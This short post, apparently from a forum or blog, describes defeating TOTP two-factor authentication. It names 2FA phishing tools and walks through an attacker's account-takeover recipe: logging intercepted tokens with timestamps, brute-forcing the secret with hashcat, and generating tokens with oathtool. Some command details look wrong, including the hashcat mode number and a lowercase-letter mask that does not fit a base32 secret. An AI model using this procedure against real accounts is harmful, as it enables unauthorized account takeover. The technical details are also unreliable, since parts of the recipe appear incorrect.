On GitHub you can find Muraena and NecroBrowser, or evilginx2, as open-source tools that can automate phishing attacks against 2FA.
If an attacker succeeds in intercepting two or more TOTP tokens and logs the time of use, he can use the "hashcat" tool to determine the secret keys and then generate valid TOTP tokens himself.
- The tokens are written together with their timestamps in the format $TOKEN:$TIMESTAMP to a text file (in the example: totp-inputs.txt):
    833060:1263384780
    549115:1528848780
- This text file is used to feed "hashcat", and the results are logged:
    hashcat -m17300 -a3 -o totp-secrets.potfile totp-inputs.txt ?l?l?l?l?l?l?l
- After a few hours or days of computing time (depending on the computing power and the quality of the keys) you look at the results:
    cut -d: -f3 totp-secrets.potfile | sort | uniq -c | sort -nr | head
- You try the list of results starting from the top. After another 5 min you will have found a TOTP secret key that enables the generation of valid tokens, and you can take over the account:
    oathtool --base32 --totp "Secret Key" -d 6
OTP does not protect against an intrusion on the server. Since in OTP the server and the client execute the same algorithm for calculating and verifying the one-time password, an attacker who can read the server's OTP parameters (the shared secret) can calculate valid OTP tokens himself. For TOTP this is especially easy:
    oathtool --base32 --totp "Secret Key" -d 6
cheers . . .